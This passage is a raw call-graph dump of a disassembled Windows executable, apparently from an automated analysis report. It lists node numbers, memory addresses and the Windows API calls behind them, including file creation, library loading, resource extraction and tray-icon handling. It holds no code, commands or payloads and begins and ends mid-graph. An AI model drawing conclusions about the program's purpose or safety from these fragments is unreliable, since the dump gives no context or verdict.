96165 7ff6bb15b164 31 API calls _invalid_parameter_noinfo 95852->96165 95853->95697 95854 7ff6bb152c80 37 API calls wcsftime 95854->95857 95856 7ff6bb148ef2 95856->95697 95857->95854 95857->95856 95859 7ff6bb12dfac 95858->95859 95860 7ff6bb144c68 4 API calls 95859->95860 95861 7ff6bb1259f5 95859->95861 95860->95861 95862 7ff6bb12d670 95861->95862 95863 7ff6bb12d698 95862->95863 95865 7ff6bb12d6a2 95863->95865 96166 7ff6bb12880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95863->96166 95866 7ff6bb12ee20 18 API calls 95865->95866 95868 7ff6bb12d7de 95865->95868 95867 7ff6bb179d43 95866->95867 95868->95728 95870 7ff6bb1a29c8 95869->95870 96167 7ff6bb1a2b70 95870->96167 95873 7ff6bb1267d8 45 API calls 95874 7ff6bb1a2a03 95873->95874 95875 7ff6bb1267d8 45 API calls 95874->95875 95876 7ff6bb1a2a23 95875->95876 95877 7ff6bb1267d8 45 API calls 95876->95877 95878 7ff6bb1a2a49 95877->95878 95879 7ff6bb1267d8 45 API calls 95878->95879 95880 7ff6bb1a2a6d 95879->95880 95881 7ff6bb1267d8 45 API calls 95880->95881 95882 7ff6bb1a2ac5 95881->95882 95883 7ff6bb1a240c 32 API calls 95882->95883 95884 7ff6bb1a2ada 95883->95884 95886 7ff6bb1a29de 95884->95886 96172 7ff6bb1a1d48 89 API calls 95884->96172 95886->95671 95888 7ff6bb126542 95887->95888 95889 7ff6bb12653d 95887->95889 95891 7ff6bb126558 95888->95891 95892 7ff6bb12656f FreeLibrary 95888->95892 96173 7ff6bb154970 95889->96173 95891->95682 95892->95891 95894 7ff6bb12a7c0 4 API calls 95893->95894 95895 7ff6bb129d99 95894->95895 95895->95785 95897 7ff6bb126490 95896->95897 95898 7ff6bb126d74 LoadLibraryA 95896->95898 95897->95799 95897->95800 95898->95897 95899 7ff6bb126d89 GetProcAddress 95898->95899 95899->95897 95901 7ff6bb1547fc 95900->95901 95902 7ff6bb15482a 95901->95902 95905 7ff6bb15485c 95901->95905 95961 7ff6bb1555d4 15 API calls memcpy_s 95902->95961 95904 7ff6bb15482f 95962 7ff6bb15b164 31 API calls _invalid_parameter_noinfo 95904->95962 95907 7ff6bb154862 95905->95907 95908 7ff6bb15486f 95905->95908 95963 7ff6bb1555d4 15 API calls memcpy_s 95907->95963 95949 7ff6bb15feb4 95908->95949 95911 7ff6bb1264cf 95911->95805 95911->95806 95913 7ff6bb154883 95964 7ff6bb1555d4 15 API calls memcpy_s 95913->95964 95914 7ff6bb154890 95956 7ff6bb160304 95914->95956 95917 7ff6bb1548a3 95965 7ff6bb14df60 LeaveCriticalSection 95917->95965 96103 7ff6bb126d1c 95919->96103 95922 7ff6bb126d1c 2 API calls 95925 7ff6bb126cf1 95922->95925 95923 7ff6bb126d0f FreeLibrary 95924 7ff6bb1264f7 95923->95924 95926 7ff6bb126580 95924->95926 95925->95923 95925->95924 95927 7ff6bb144c68 4 API calls 95926->95927 95928 7ff6bb1265b5 memcpy_s 95927->95928 95929 7ff6bb16c9f5 95928->95929 95930 7ff6bb126740 CreateStreamOnHGlobal 95928->95930 95939 7ff6bb126602 95928->95939 96107 7ff6bb1a2e00 45 API calls 95929->96107 95931 7ff6bb126759 FindResourceExW 95930->95931 95930->95939 95931->95939 95933 7ff6bb16c97e LoadResource 95935 7ff6bb16c997 SizeofResource 95933->95935 95933->95939 95934 7ff6bb1267d8 45 API calls 95934->95939 95936 7ff6bb16c9ae LockResource 95935->95936 95935->95939 95936->95939 95937 7ff6bb16c9fd 95938 7ff6bb1267d8 45 API calls 95937->95938 95940 7ff6bb1266e8 95938->95940 95939->95933 95939->95934 95939->95937 95939->95940 95940->95813 95942 7ff6bb16ca6c 95941->95942 95943 7ff6bb1267f7 95941->95943 96108 7ff6bb154c5c 95943->96108 95946 7ff6bb1a240c 96127 7ff6bb1a2200 95946->96127 95948 7ff6bb1a2430 95948->95821 95966 7ff6bb15b9bc EnterCriticalSection 95949->95966 95951 7ff6bb15fecb 95952 7ff6bb15ff54 18 API calls 95951->95952 95953 7ff6bb15fed6 95952->95953 95954 7ff6bb15ba10 _isindst LeaveCriticalSection 95953->95954 95955 7ff6bb154879 95954->95955 95955->95913 95955->95914 95967 7ff6bb160040 95956->95967 95959 7ff6bb16035e 95959->95917 95961->95904 95962->95911 95963->95911 95964->95911 95972 7ff6bb16007d try_get_function 95967->95972 95969 7ff6bb1602de 95986 7ff6bb15b164 31 API calls _invalid_parameter_noinfo 95969->95986 95971 7ff6bb16021a 95971->95959 95979 7ff6bb167738 95971->95979 95975 7ff6bb160211 95972->95975 95982 7ff6bb14db68 37 API calls 4 library calls 95972->95982 95974 7ff6bb160277 95974->95975 95983 7ff6bb14db68 37 API calls 4 library calls 95974->95983 95975->95971 95985 7ff6bb1555d4 15 API calls memcpy_s 95975->95985 95977 7ff6bb16029a 95977->95975 95984 7ff6bb14db68 37 API calls 4 library calls 95977->95984 95987 7ff6bb166d04 95979->95987 95982->95974 95983->95977 95984->95975 95985->95969 95986->95971 95988 7ff6bb166d28 95987->95988 95989 7ff6bb166d40 95987->95989 96041 7ff6bb1555d4 15 API calls memcpy_s 95988->96041 95989->95988 95991 7ff6bb166d6d 95989->95991 95998 7ff6bb167348 95991->95998 95992 7ff6bb166d2d 96042 7ff6bb15b164 31 API calls _invalid_parameter_noinfo 95992->96042 95996 7ff6bb166d39 95996->95959 96044 7ff6bb167078 95998->96044 96001 7ff6bb1673bc 96076 7ff6bb1555b4 15 API calls memcpy_s 96001->96076 96002 7ff6bb1673d3 96064 7ff6bb15e418 96002->96064 96006 7ff6bb1673f7 CreateFileW 96009 7ff6bb1674eb GetFileType 96006->96009 96010 7ff6bb167469 96006->96010 96007 7ff6bb1673df 96078 7ff6bb1555b4 15 API calls memcpy_s 96007->96078 96014 7ff6bb1674f8 GetLastError 96009->96014 96020 7ff6bb167549 96009->96020 96013 7ff6bb1674b8 GetLastError 96010->96013 96016 7ff6bb167478 CreateFileW 96010->96016 96012 7ff6bb1673e4 96079 7ff6bb1555d4 15 API calls memcpy_s 96012->96079 96080 7ff6bb155564 15 API calls 2 library calls 96013->96080 96081 7ff6bb155564 15 API calls 2 library calls 96014->96081 96016->96009 96016->96013 96019 7ff6bb1673c1 96077 7ff6bb1555d4 15 API calls memcpy_s 96019->96077 96083 7ff6bb15e334 16 API calls 2 library calls 96020->96083 96021 7ff6bb167507 CloseHandle 96021->96019 96022 7ff6bb167539 96021->96022 96082 7ff6bb1555d4 15 API calls memcpy_s 96022->96082 96025 7ff6bb167568 96027 7ff6bb1675b5 96025->96027 96084 7ff6bb167284 67 API calls 2 library calls 96025->96084 96026 7ff6bb16753e 96026->96019 96031 7ff6bb1675ec 96027->96031 96085 7ff6bb166de4 67 API calls 4 library calls 96027->96085 96030 7ff6bb1675e8 96030->96031 96032 7ff6bb1675fe 96030->96032 96086 7ff6bb1604b8 96031->96086 96034 7ff6bb166d95 96032->96034 96035 7ff6bb167681 CloseHandle CreateFileW 96032->96035 96034->95996 96043 7ff6bb15e3f4 LeaveCriticalSection 96034->96043 96036 7ff6bb1676cb GetLastError 96035->96036 96037 7ff6bb1676f9 96035->96037 96101 7ff6bb155564 15 API calls 2 library calls 96036->96101 96037->96034 96039 7ff6bb1676d8 96102 7ff6bb15e548 16 API calls 2 library calls 96039->96102 96041->95992 96042->95996 96045 7ff6bb1670a4 96044->96045 96053 7ff6bb1670be 96044->96053 96046 7ff6bb1555d4 memcpy_s 15 API calls 96045->96046 96045->96053 96047 7ff6bb1670b3 96046->96047 96048 7ff6bb15b164 _invalid_parameter_noinfo 31 API calls 96047->96048 96048->96053 96049 7ff6bb16718c 96051 7ff6bb152554 31 API calls 96049->96051 96062 7ff6bb1671ec 96049->96062 96050 7ff6bb16713b 96050->96049 96052 7ff6bb1555d4 memcpy_s 15 API calls 96050->96052 96054 7ff6bb1671e8 96051->96054 96055 7ff6bb167181 96052->96055 96053->96050 96056 7ff6bb1555d4 memcpy_s 15 API calls 96053->96056 96057 7ff6bb16726b 96054->96057 96054->96062 96058 7ff6bb15b164 _invalid_parameter_noinfo 31 API calls 96055->96058 96059 7ff6bb167130 96056->96059 96060 7ff6bb15b184 _isindst 16 API calls 96057->96060 96058->96049 96061 7ff6bb15b164 _invalid_parameter_noinfo 31 API calls 96059->96061 96063 7ff6bb167280 96060->96063 96061->96050 96062->96001 96062->96002 96065 7ff6bb15b9bc _isindst EnterCriticalSection 96064->96065 96066 7ff6bb15e43b 96065->96066 96067 7ff6bb15e464 96066->96067 96072 7ff6bb15e4c2 EnterCriticalSection 96066->96072 96075 7ff6bb15e487 96066->96075 96069 7ff6bb15e170 16 API calls 96067->96069 96068 7ff6bb15ba10 _isindst LeaveCriticalSection 96070 7ff6bb15e52a 96068->96070 96071 7ff6bb15e469 96069->96071 96070->96006 96070->96007 96074 7ff6bb15e310 fwprintf EnterCriticalSection 96071->96074 96071->96075 96073 7ff6bb15e4d1 LeaveCriticalSection 96072->96073 96072->96075 96073->96066 96074->96075 96075->96068 96076->96019 96077->96034 96078->96012 96079->96019 96080->96019 96081->96021 96082->96026 96083->96025 96084->96027 96085->96030 96087 7ff6bb15e604 31 API calls 96086->96087 96088 7ff6bb1604cc 96087->96088 96089 7ff6bb1604d2 96088->96089 96090 7ff6bb16050c 96088->96090 96093 7ff6bb15e604 31 API calls 96088->96093 96091 7ff6bb15e548 16 API calls 96089->96091 96090->96089 96094 7ff6bb15e604 31 API calls 96090->96094 96092 7ff6bb160534 96091->96092 96095 7ff6bb160560 96092->96095 96098 7ff6bb155564 fread_s 15 API calls 96092->96098 96096 7ff6bb1604ff 96093->96096 96097 7ff6bb160518 CloseHandle 96094->96097 96095->96034 96099 7ff6bb15e604 31 API calls 96096->96099 96097->96089 96100 7ff6bb160525 GetLastError 96097->96100 96098->96095 96099->96090 96100->96089 96101->96039 96102->96037 96104 7ff6bb126d2c LoadLibraryA 96103->96104 96105 7ff6bb126ce3 96103->96105 96104->96105 96106 7ff6bb126d41 GetProcAddress 96104->96106 96105->95922 96105->95925 96106->96105 96107->95937 96111 7ff6bb154c7c 96108->96111 96112 7ff6bb154ca6 96111->96112 96123 7ff6bb12680a 96111->96123 96113 7ff6bb154cd7 96112->96113 96114 7ff6bb154cb5 memcpy_s 96112->96114 96112->96123 96126 7ff6bb14df54 EnterCriticalSection 96113->96126 96124 7ff6bb1555d4 15 API calls memcpy_s 96114->96124 96118 7ff6bb154cca 96125 7ff6bb15b164 31 API calls _invalid_parameter_noinfo 96118->96125 96123->95946 96124->96118 96125->96123 96130 7ff6bb1547bc 96127->96130 96129 7ff6bb1a2210 96129->95948 96133 7ff6bb154724 96130->96133 96134 7ff6bb154732 96133->96134 96136 7ff6bb154746 96133->96136 96141 7ff6bb1555d4 15 API calls memcpy_s 96134->96141 96137 7ff6bb154742 96136->96137 96143 7ff6bb15bef8 6 API calls __vcrt_uninitialize_ptd 96136->96143 96137->96129 96138 7ff6bb154737 96142 7ff6bb15b164 31 API calls _invalid_parameter_noinfo 96138->96142 96141->96138 96142->96137 96143->96137 96145 7ff6bb131a48 96144->96145 96146 7ff6bb131c5f 96144->96146 96154 7ff6bb131a90 96145->96154 96160 7ff6bb145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96145->96160 96146->95824 96154->95824 96156 7ff6bb12f1ce 96155->96156 96158 7ff6bb12f1d8 96155->96158 96157 7ff6bb131a30 45 API calls 96156->96157 96157->96158 96158->95834 96159->95832 96161->95847 96162->95851 96163->95846 96164->95852 96165->95856 96166->95865 96168 7ff6bb1a2bae 96167->96168 96169 7ff6bb1267d8 45 API calls 96168->96169 96170 7ff6bb1a29da 96168->96170 96171 7ff6bb1a240c 32 API calls 96168->96171 96169->96168 96170->95873 96170->95886 96171->96168 96172->95886 96174 7ff6bb15498e 96173->96174 96176 7ff6bb1549a3 96173->96176 96186 7ff6bb1555d4 15 API calls memcpy_s 96174->96186 96181 7ff6bb15499e 96176->96181 96185 7ff6bb14df54 EnterCriticalSection 96176->96185 96178 7ff6bb154993 96187 7ff6bb15b164 31 API calls _invalid_parameter_noinfo 96178->96187 96179 7ff6bb1549b9 96182 7ff6bb1548ec 60 API calls 96179->96182 96181->95888 96183 7ff6bb1549c2 96182->96183 96184 7ff6bb14df60 fflush LeaveCriticalSection 96183->96184 96184->96181 96186->96178 96187->96181 96189 7ff6bb168f90 wcsftime 96188->96189 96190 7ff6bb123ec4 GetLongPathNameW 96189->96190 96191 7ff6bb127cf4 4 API calls 96190->96191 96192 7ff6bb123eed 96191->96192 96193 7ff6bb124074 96192->96193 96194 7ff6bb129640 4 API calls 96193->96194 96195 7ff6bb12408e 96194->96195 96196 7ff6bb1256d4 5 API calls 96195->96196 96197 7ff6bb12409b 96196->96197 96198 7ff6bb1240a7 96197->96198 96199 7ff6bb16bada 96197->96199 96200 7ff6bb124680 4 API calls 96198->96200 96204 7ff6bb16bb0f 96199->96204 96240 7ff6bb141ad0 CompareStringW 96199->96240 96202 7ff6bb1240b5 96200->96202 96236 7ff6bb1240e8 96202->96236 96205 7ff6bb1240cb Concurrency::wait 96205->95745 96207 7ff6bb126460 105 API calls 96206->96207 96208 7ff6bb1263e5 96207->96208 96209 7ff6bb16c656 96208->96209 96211 7ff6bb126460 105 API calls 96208->96211 96210 7ff6bb1a2948 90 API calls 96209->96210 96212 7ff6bb16c66e 96210->96212 96213 7ff6bb126400 96211->96213 96214 7ff6bb16c672 96212->96214 96215 7ff6bb16c690 96212->96215 96213->96209 96216 7ff6bb126408 96213->96216 96217 7ff6bb12652c 63 API calls 96214->96217 96218 7ff6bb144c68 4 API calls 96215->96218 96219 7ff6bb16c67b 96216->96219 96220 7ff6bb126414 96216->96220 96217->96219 96235 7ff6bb16c6dd Concurrency::wait 96218->96235 96257 7ff6bb19c5c8 77 API calls wprintf 96219->96257 96256 7ff6bb12e774 143 API calls Concurrency::wait 96220->96256 96223 7ff6bb16c68a 96223->96215 96224 7ff6bb126438 96224->95739 96225 7ff6bb16c895 96226 7ff6bb12652c 63 API calls 96225->96226 96234 7ff6bb16c8a9 96226->96234 96231 7ff6bb12ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96231->96235 96234->96225 96259 7ff6bb1976d8 77 API calls 3 library calls 96234->96259 96235->96225 96235->96231 96235->96234 96241 7ff6bb197400 96235->96241 96244 7ff6bb1a0210 96235->96244 96248 7ff6bb12b26c 96235->96248 96252 7ff6bb129940 96235->96252 96258 7ff6bb19730c 39 API calls 96235->96258 96237 7ff6bb124107 96236->96237 96239 7ff6bb124130 memcpy_s 96236->96239 96238 7ff6bb144c68 4 API calls 96237->96238 96238->96239 96239->96205 96240->96199 96242 7ff6bb144c68 4 API calls 96241->96242 96243 7ff6bb19744e memcpy_s 96242->96243 96243->96235 96245 7ff6bb1a022e 96244->96245 96246 7ff6bb12ec00 4 API calls 96245->96246 96247 7ff6bb1a0250 96246->96247 96247->96235 96249 7ff6bb12b28f memcpy_s 96248->96249 96250 7ff6bb12b323 96248->96250 96249->96235 96251 7ff6bb144c68 4 API calls 96250->96251 96251->96249 96253 7ff6bb129967 96252->96253 96255 7ff6bb129999 96252->96255 96254 7ff6bb144c68 4 API calls 96253->96254 96253->96255 96254->96255 96255->96235 96256->96224 96257->96223 96258->96235 96259->96234 96261 7ff6bb12988d 96260->96261 96262 7ff6bb129762 96260->96262 96261->95750 96262->96261 96263 7ff6bb144c68 4 API calls 96262->96263 96265 7ff6bb129791 96263->96265 96264 7ff6bb144c68 4 API calls 96269 7ff6bb12981c 96264->96269 96265->96264 96267 7ff6bb129940 4 API calls 96267->96269 96268 7ff6bb12b26c 4 API calls 96268->96269 96269->96261 96269->96267 96269->96268 96272 7ff6bb12abe0 81 API calls 2 library calls 96269->96272 96270->95752 96271->95754 96272->96269 96273->95765 96275 7ff6bb123b40 96274->96275 96277 7ff6bb16ba0e 96274->96277 96279 7ff6bb129a64 96275->96279 96278 7ff6bb123b58 96278->95769 96280 7ff6bb129a69 96279->96280 96281 7ff6bb129a9e 96279->96281 96280->96281 96283 7ff6bb15b3c0 96280->96283 96281->96278 96284 7ff6bb15b3c5 RtlFreeHeap 96283->96284 96288 7ff6bb15b3f5 Concurrency::details::SchedulerProxy::DeleteThis 96283->96288 96285 7ff6bb15b3e0 96284->96285 96284->96288 96289 7ff6bb1555d4 15 API calls memcpy_s 96285->96289 96287 7ff6bb15b3e5 GetLastError 96287->96288 96288->96280 96289->96287 96291 7ff6bb127c73 96290->96291 96294 7ff6bb127cab memcpy_s 96290->96294 96292 7ff6bb127c9c 96291->96292 96291->96294 96295 7ff6bb16d256 96291->96295 96293 7ff6bb12b960 4 API calls 96292->96293 96293->96294 96294->95778 96296 7ff6bb144c68 4 API calls 96295->96296 96297 7ff6bb16d2a6 memcpy_s 96296->96297 96298->95779 96299 7ff6bb148fac 96300 7ff6bb14901c 96299->96300 96301 7ff6bb148fd2 GetModuleHandleW 96299->96301 96316 7ff6bb15b9bc EnterCriticalSection 96300->96316 96301->96300 96306 7ff6bb148fdf 96301->96306 96303 7ff6bb15ba10 _isindst LeaveCriticalSection 96305 7ff6bb1490f0 96303->96305 96304 7ff6bb149026 96308 7ff6bb15aa8c 30 API calls 96304->96308 96313 7ff6bb1490a0 96304->96313 96314 7ff6bb1490cb 96304->96314 96312 7ff6bb149118 11 API calls 96305->96312 96315 7ff6bb1490fc 96305->96315 96306->96300 96317 7ff6bb149164 GetModuleHandleExW 96306->96317 96307 7ff6bb1490b8 96311 7ff6bb15ada4 75 API calls 96307->96311 96308->96313 96310 7ff6bb15ada4 75 API calls 96310->96307 96311->96314 96312->96315 96313->96307 96313->96310 96314->96303 96318 7ff6bb1491b5 96317->96318 96319 7ff6bb14918e GetProcAddress 96317->96319 96320 7ff6bb1491c5 96318->96320 96321 7ff6bb1491bf FreeLibrary 96318->96321 96319->96318 96322 7ff6bb1491a8 96319->96322 96320->96300 96321->96320 96322->96318 96323 7ff6bb15c51c 96324 7ff6bb15c567 96323->96324 96328 7ff6bb15c52b fread_s 96323->96328 96331 7ff6bb1555d4 15 API calls memcpy_s 96324->96331 96325 7ff6bb15c54e HeapAlloc 96327 7ff6bb15c565 96325->96327 96325->96328 96328->96324 96328->96325 96330 7ff6bb14925c EnterCriticalSection LeaveCriticalSection fread_s 96328->96330 96330->96328 96331->96327 96332 7ff6bb132c17 96335 7ff6bb1314a0 96332->96335 96334 7ff6bb132c2a 96336 7ff6bb1314d3 96335->96336 96337 7ff6bb17be31 96336->96337 96340 7ff6bb17bdf2 96336->96340 96341 7ff6bb17bdd1 96336->96341 96367 7ff6bb1314fa memcpy_s 96336->96367 96407 7ff6bb1b8f48 300 API calls 3 library calls 96337->96407 96342 7ff6bb17be19 96340->96342 96405 7ff6bb1b9a88 300 API calls 4 library calls 96340->96405 96343 7ff6bb17bddb 96341->96343 96341->96367 96406 7ff6bb1a34e4 77 API calls 3 library calls 96342->96406 96404 7ff6bb1b9514 300 API calls 96343->96404 96345 7ff6bb131884 96395 7ff6bb142130 45 API calls 96345->96395 96351 7ff6bb131898 96351->96334 96352 7ff6bb131a30 45 API calls 96352->96367 96358 7ff6bb12ee20 18 API calls 96358->96367 96359 7ff6bb142130 45 API calls 96359->96367 96360 7ff6bb131799 96369 7ff6bb131815 96360->96369 96410 7ff6bb1a34e4 77 API calls 3 library calls 96360->96410 96361 7ff6bb17bfe4 96409 7ff6bb1b93a4 77 API calls 96361->96409 96365 7ff6bb12e0a8 4 API calls 96365->96367 96367->96345 96367->96352 96367->96358 96367->96359 96367->96360 96367->96361 96367->96365 96367->96369 96370 7ff6bb133c20 96367->96370 96394 7ff6bb12ef9c 46 API calls 96367->96394 96396 7ff6bb1420d0 45 API calls 96367->96396 96397 7ff6bb125af8 300 API calls 96367->96397 96398 7ff6bb145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96367->96398 96399 7ff6bb1435c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96367->96399 96400 7ff6bb144f0c 34 API calls _onexit 96367->96400 96401 7ff6bb1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96367->96401 96402 7ff6bb1436c4 77 API calls 96367->96402 96403 7ff6bb1437dc 300 API calls 96367->96403 96408 7ff6bb18ac10 18 API calls 96367->96408 96369->96334 96393 7ff6bb133c80 96370->96393 96371 7ff6bb145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96371->96393 96372 7ff6bb1805be 96414 7ff6bb1a34e4 77 API calls 3 library calls 96372->96414 96374 7ff6bb1805d1 96374->96367 96376 7ff6bb134ac0 96376->96367 96377 7ff6bb134fe7 96381 7ff6bb12e0a8 4 API calls 96377->96381 96378 7ff6bb12e0a8 4 API calls 96380 7ff6bb133dde 96378->96380 96379 7ff6bb17fbe9 96412 7ff6bb1a34e4 77 API calls 3 library calls 96379->96412 96380->96367 96381->96380 96382 7ff6bb17fefe 96387 7ff6bb12e0a8 4 API calls 96382->96387 96384 7ff6bb18044f 96385 7ff6bb12e0a8 4 API calls 96385->96393 96386 7ff6bb134a8f 96386->96376 96386->96382 96388 7ff6bb134aa9 96386->96388 96387->96376 96388->96376 96388->96378 96390 7ff6bb144f0c 34 API calls __scrt_initialize_thread_safe_statics 96390->96393 96391 7ff6bb129640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96391->96393 96392 7ff6bb1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 96392->96393 96393->96371 96393->96372 96393->96377 96393->96379 96393->96380 96393->96385 96393->96386 96393->96388 96393->96390 96393->96391 96393->96392 96411 7ff6bb135360 300 API calls Concurrency::wait 96393->96411 96413 7ff6bb1a34e4 77 API calls 3 library calls 96393->96413 96394->96367 96395->96351 96396->96367 96397->96367 96399->96367 96400->96367 96402->96367 96403->96367 96404->96369 96405->96342 96406->96337 96407->96367 96408->96367 96409->96360 96410->96360 96411->96393 96412->96384 96413->96393 96414->96374 96415 7ff6bb125dec 96416 7ff6bb125df4 96415->96416 96417 7ff6bb125e98 96416->96417 96418 7ff6bb125e28 96416->96418 96456 7ff6bb125e96 96416->96456 96420 7ff6bb16c229 96417->96420 96421 7ff6bb125e9e 96417->96421 96422 7ff6bb125f21 PostQuitMessage 96418->96422 96423 7ff6bb125e35 96418->96423 96419 7ff6bb125e6b DefWindowProcW 96453 7ff6bb125e7c 96419->96453 96465 7ff6bb13ede4 8 API calls 96420->96465 96425 7ff6bb125ecc SetTimer RegisterWindowMessageW 96421->96425 96426 7ff6bb125ea5 96421->96426 96422->96453 96427 7ff6bb125e40 96423->96427 96428 7ff6bb16c2af 96423->96428 96429 7ff6bb125efc CreatePopupMenu 96425->96429 96425->96453 96434 7ff6bb16c1b8 96426->96434 96435 7ff6bb125eae KillTimer 96426->96435 96430 7ff6bb125e49 96427->96430 96431 7ff6bb125f2b 96427->96431 96477 7ff6bb19a40c 16 API calls memcpy_s 96428->96477 96429->96453 96441 7ff6bb125f0b 96430->96441 96442 7ff6bb125e5f 96430->96442 96430->96456 96463 7ff6bb144610 9 API calls memcpy_s 96431->96463 96433 7ff6bb16c255 96466 7ff6bb142c44 47 API calls Concurrency::wait 96433->96466 96438 7ff6bb16c1bd 96434->96438 96439 7ff6bb16c1f7 MoveWindow 96434->96439 96457 7ff6bb125d88 96435->96457 96445 7ff6bb16c1e4 SetFocus 96438->96445 96446 7ff6bb16c1c2 96438->96446 96439->96453 96462 7ff6bb125f3c 26 API calls memcpy_s 96441->96462 96442->96419 96452 7ff6bb125d88 Shell_NotifyIconW 96442->96452 96443 7ff6bb16c2c3 96443->96419 96443->96453 96444 7ff6bb125f1f 96444->96453 96445->96453 96446->96442 96449 7ff6bb16c1cb 96446->96449 96464 7ff6bb13ede4 8 API calls 96449->96464 96454 7ff6bb16c280 96452->96454 96467 7ff6bb126258 96454->96467 96456->96419 96458 7ff6bb125de4 96457->96458 96459 7ff6bb125d99 memcpy_s 96457->96459 96461 7ff6bb127098 DeleteObject DestroyWindow Concurrency::wait 96458->96461 96460 7ff6bb125db8 Shell_NotifyIconW 96459->96460 96460->96458 96461->96453 96462->96444 96463->96444 96464->96453 96465->96433 96466->96442 96468 7ff6bb126287 memcpy_s 96467->96468 96478 7ff6bb1261c4 96468->96478 96471 7ff6bb12632d 96473 7ff6bb16c644 Shell_NotifyIconW 96471->96473 96474 7ff6bb12634e Shell_NotifyIconW 96471->96474 96482 7ff6bb1272c8 96474->96482 96476 7ff6bb126365 96476->96456 96477->96443 96479 7ff6bb16c5f8 96478->96479 96480 7ff6bb1261e0 96478->96480 96479->96480 96481 7ff6bb16c602 DestroyIcon 96479->96481 96480->96471 96504 7ff6bb19ad94 39 API calls wcsftime 96480->96504 96481->96480 96483 7ff6bb1273bc Concurrency::wait 96482->96483 96484 7ff6bb1272f4 96482->96484 96483->96476 96505 7ff6bb1298e8 96484->96505 96486 7ff6bb127303 96487 7ff6bb16cdfc LoadStringW 96486->96487 96488 7ff6bb127310 96486->96488 96490 7ff6bb16ce1e 96487->96490 96489 7ff6bb127cf4 4 API calls 96488->96489 96491 7ff6bb127324 96489->96491 96492 7ff6bb12e0a8 4 API calls 96490->96492 96493 7ff6bb127336 96491->96493 96494 7ff6bb16ce30 96491->96494 96500 7ff6bb12734f memcpy_s wcscpy 96492->96500 96493->96490 96495 7ff6bb127343 96493->96495 96496 7ff6bb127c24 4 API calls 96494->96496 96497 7ff6bb127c24 4 API calls 96495->96497 96498 7ff6bb16ce3c 96496->96498 96497->96500 96499 7ff6bb1271f8 4 API calls 96498->96499 96498->96500 96501 7ff6bb16ce63 96499->96501 96502 7ff6bb1273a3 Shell_NotifyIconW 96500->96502 96503 7ff6bb1271f8 4 API calls 96501->96503 96502->96483 96503->96500 96504->96471 96506 7ff6bb144c68 4 API calls 96505->96506 96507 7ff6bb129918 96506->96507 96507->96486 96508 7ff6bb1347e1 96509 7ff6bb134d57 96508->96509 96513 7ff6bb1347f2 96508->96513 96510 7ff6bb12ee20 18 API calls 96509->96510 96511 7ff6bb134d66 96510->96511 96512 7ff6bb12ee20 18 API calls 96511->96512 96515 7ff6bb134df3 96512->96515 96513->96511 96514 7ff6bb134862 96513->96514 96513->96515 96534 7ff6bb133c80 96514->96534 96541 7ff6bb1366c0 96514->96541 96575 7ff6bb1a0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96515->96575 96518 7ff6bb1805be 96578 7ff6bb1a34e4 77 API calls 3 library calls 96518->96578 96520 7ff6bb1805d1 96521 7ff6bb144f0c 34 API calls __scrt_initialize_thread_safe_statics 96521->96534 96523 7ff6bb134ac0 96524 7ff6bb134fe7 96529 7ff6bb12e0a8 4 API calls 96524->96529 96525 7ff6bb12e0a8 4 API calls 96528 7ff6bb133dde 96525->96528 96526 7ff6bb1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 96526->96534 96527 7ff6bb17fbe9 96576 7ff6bb1a34e4 77 API calls 3 library calls 96527->96576 96529->96528 96530 7ff6bb17fefe 96536 7ff6bb12e0a8 4 API calls 96530->96536 96532 7ff6bb18044f 96533 7ff6bb12e0a8 4 API calls 96533->96534 96534->96518 96534->96521 96534->96524 96534->96526 96534->96527 96534->96528 96534->96533 96535 7ff6bb134a8f 96534->96535 96537 7ff6bb134aa9 96534->96537 96539 7ff6bb145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96534->96539 96540 7ff6bb129640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96534->96540 96574 7ff6bb135360 300 API calls Concurrency::wait 96534->96574 96577 7ff6bb1a34e4 77 API calls 3 library calls 96534->96577 96535->96523 96535->96530 96535->96537 96536->96523 96537->96523 96537->96525 96539->96534 96540->96534 96566 7ff6bb13673b memcpy_s Concurrency::wait 96541->96566 96543 7ff6bb181fac 96544 7ff6bb181fbe 96543->96544 96697 7ff6bb1bab30 300 API calls Concurrency::wait 96543->96697 96544->96534 96546 7ff6bb12ec00 4 API calls 96546->96566 96547 7ff6bb136c0f 96548 7ff6bb181fc9 96547->96548 96549 7ff6bb136c3d 96547->96549 96698 7ff6bb1a34e4 77 API calls 3 library calls 96548->96698 96551 7ff6bb12ee20 18 API calls 96549->96551 96552 7ff6bb136c4a 96551->96552 96695 7ff6bb141fcc 300 API calls 96552->96695 96556 7ff6bb144c68 4 API calls 96556->96566 96557 7ff6bb1820c1 96567 7ff6bb136b15 96557->96567 96701 7ff6bb1a34e4 77 API calls 3 library calls 96557->96701 96558 7ff6bb136c78 96696 7ff6bb13e8f4 18 API calls 96558->96696 96559 7ff6bb136d40 9 API calls 96559->96566 96562 7ff6bb133c20 300 API calls 96562->96566 96563 7ff6bb182032 96699 7ff6bb1a34e4 77 API calls 3 library calls 96563->96699 96564 7ff6bb12e0a8 4 API calls 96564->96566 96566->96543 96566->96546 96566->96547 96566->96548 96566->96552 96566->96556 96566->96557 96566->96558 96566->96559 96566->96562 96566->96563 96566->96564 96566->96567 96579 7ff6bb1a5b80 96566->96579 96585 7ff6bb1a8e98 96566->96585 96618 7ff6bb1af084 96566->96618 96623 7ff6bb1bf0ac 96566->96623 96626 7ff6bb1a7e48 96566->96626 96660 7ff6bb1a8ea0 96566->96660 96693 7ff6bb145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96566->96693 96694 7ff6bb1450b4 EnterCriticalSection LeaveCriticalSection 